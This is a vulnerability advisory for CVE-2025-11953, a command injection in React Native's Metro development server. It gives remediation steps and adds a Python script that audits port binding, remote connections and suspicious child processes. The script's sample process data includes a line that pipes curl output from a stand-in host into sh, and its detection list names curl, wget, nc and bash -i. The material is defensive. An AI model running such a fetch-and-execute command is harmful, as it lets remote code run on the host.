CVE-2025-11953
The Metro Development · Multiple Products
A critical vulnerability has been identified in The Metro Development Server, a tool commonly used in React Native development environments.
Executive summary
A critical vulnerability has been identified in The Metro Development Server, a tool commonly used in React Native development environments. This flaw allows an attacker on the same network to execute arbitrary commands on a developer's machine, leading to a complete system compromise. Due to the high severity and ease of exploitation, this vulnerability poses a significant risk of intellectual property theft, malware infection, and further intrusion into the corporate network.
Vulnerability
The Metro Development Server, often initiated by the React Native Community CLI during development, incorrectly binds to all network interfaces (0.0.0.0) by default. This exposes the server to the local network. The server contains an endpoint that does not properly sanitize user-supplied input, creating an OS command injection vulnerability. An unauthenticated attacker on the same network can send a specially crafted HTTP request to this endpoint to execute arbitrary commands on the host operating system with the privileges of the user running the development server.
Business impact
This vulnerability is rated as critical severity with a CVSS score of 9.8. Successful exploitation could lead to a complete compromise of developer workstations, which are high-value targets. The potential consequences include theft of sensitive source code, API keys, and other intellectual property; installation of ransomware or spyware; and using the compromised machine as a beachhead to launch further attacks against the internal network. The direct impact on development productivity and the indirect impact on corporate security are severe.
Remediation
Immediate Action: Apply security updates immediately by upgrading the affected Metro Development Server packages to the latest patched version as recommended by the vendor. After patching, review server and system access logs for any signs of compromise or suspicious activity originating from other devices on the local network.
Proactive Monitoring: Monitor network traffic for connections to the Metro server port (typically 8081) from any IP address other than localhost (127.0.0.1). On host systems, monitor for unexpected child processes being spawned by the Node.js process associated with the Metro server. Implement endpoint detection and response (EDR) rules to alert on suspicious command-line executions (e.g., curl, wget, reverse shells) originating from development tools.
Compensating Controls: If immediate patching is not feasible, implement the following controls:
- Configure host-based firewalls on developer machines to block all incoming connections to the Metro server port from external interfaces, allowing access only from localhost.
- Enforce a policy prohibiting developers from running the development server while connected to untrusted networks, such as public Wi-Fi.
- Where the development server must be run, explicitly configure it to bind only to the localhost interface (127.0.0.1) rather than to all interfaces (0.0.0.0).
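The following script is an added example, not part of this advisory or of the Metro project, showing how the monitoring and compensating-control checks above can be put into code: it audits which address the Metro port is bound to, flags connections to that port from non-loopback peers, and flags shell or download-tool children of the Node.js process that runs Metro. The socket and process listings are constructed samples in the shape of `ss -ltn` / `ss -tn` and a `pid ppid comm args` process listing; the column layout, the port number (8081) and the process names are assumptions to be adjusted for the host being checked.

```python
import re

METRO_PORT = 8081                      # default Metro port per the advisory (assumed)
LOOPBACK = {"127.0.0.1", "::1"}        # only these local addresses are acceptable

# Constructed sample in the shape of `ss -ltn` output (not captured from a real host).
SAMPLE_LISTENERS = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port
LISTEN  0       511     0.0.0.0:8081         0.0.0.0:*
LISTEN  0       128     127.0.0.1:631        0.0.0.0:*
LISTEN  0       511     [::]:8081            [::]:*
"""

# Constructed sample in the shape of `ss -tn` output (established connections).
SAMPLE_CONNECTIONS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
ESTAB  0      0      127.0.0.1:8081      127.0.0.1:52144
ESTAB  0      0      192.168.1.20:8081   192.168.1.77:41022
ESTAB  0      0      192.168.1.20:22     192.168.1.5:55512
"""

# Constructed sample process listing: "pid ppid comm args" (hypothetical paths).
SAMPLE_PROCESSES = """\
4101 1    node   node /home/dev/app/node_modules/.bin/react-native start
4222 4101 sh     sh -c curl http://example.invalid/x | sh
4223 4101 node   node /home/dev/app/node_modules/metro/src/DeltaBundler/Worker.js
"""

SHELL_NAMES = {"sh", "bash", "zsh", "dash", "cmd.exe", "powershell"}
NET_TOOLS = ("curl ", "wget ", "nc ", "ncat ", "bash -i")


def split_addr(addr):
    """Split 'host:port' (IPv4 or bracketed IPv6) into (host, port-or-None)."""
    host, _, port = addr.rpartition(":")
    return host.strip("[]"), (int(port) if port.isdigit() else None)


def exposed_listeners(ss_output):
    """Return local sockets where the Metro port listens on a non-loopback address."""
    findings = []
    for line in ss_output.splitlines()[1:]:          # skip header row
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue
        host, port = split_addr(fields[3])
        if port == METRO_PORT and host not in LOOPBACK:
            findings.append(fields[3])
    return findings


def remote_metro_connections(ss_output):
    """Return peer hosts connected to the Metro port from anything but loopback."""
    findings = []
    for line in ss_output.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 5:
            continue
        _, local_port = split_addr(fields[3])
        peer_host, _ = split_addr(fields[4])
        if local_port == METRO_PORT and peer_host not in LOOPBACK:
            findings.append(peer_host)
    return findings


def suspicious_children(ps_output):
    """Return (pid, args) of shell/download-tool children of the Metro node process."""
    procs = []
    for line in ps_output.splitlines():
        parts = line.split(None, 3)
        if len(parts) == 4:
            procs.append((int(parts[0]), int(parts[1]), parts[2], parts[3]))
    # The Metro server is the node process started via `react-native start`.
    metro_pids = {pid for pid, _, comm, args in procs
                  if comm == "node" and re.search(r"react-native start", args)}
    return [(pid, args) for pid, ppid, comm, args in procs
            if ppid in metro_pids
            and (comm in SHELL_NAMES or args.startswith(NET_TOOLS))]


if __name__ == "__main__":
    print("Metro bound to non-loopback:", exposed_listeners(SAMPLE_LISTENERS))
    print("Remote peers on Metro port:", remote_metro_connections(SAMPLE_CONNECTIONS))
    print("Suspicious Metro children:", suspicious_children(SAMPLE_PROCESSES))
```

Any non-empty result from `exposed_listeners` means the compensating control (loopback-only binding) is not in effect; the other two functions correspond to the network and host monitoring recommended above and are the kind of logic an EDR rule or a periodic cron check would implement.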
Exploitation status
Public Exploit Available: true
Analyst recommendation
Given the critical CVSS score of 9.8 and the public availability of exploit code, this vulnerability represents an immediate and severe threat to the organization. The risk of a full developer machine compromise is high. We strongly recommend that all teams utilizing The Metro Development Server apply the necessary patches with the highest priority. Although this vulnerability is not currently listed on the CISA KEV list, its severity warrants immediate action.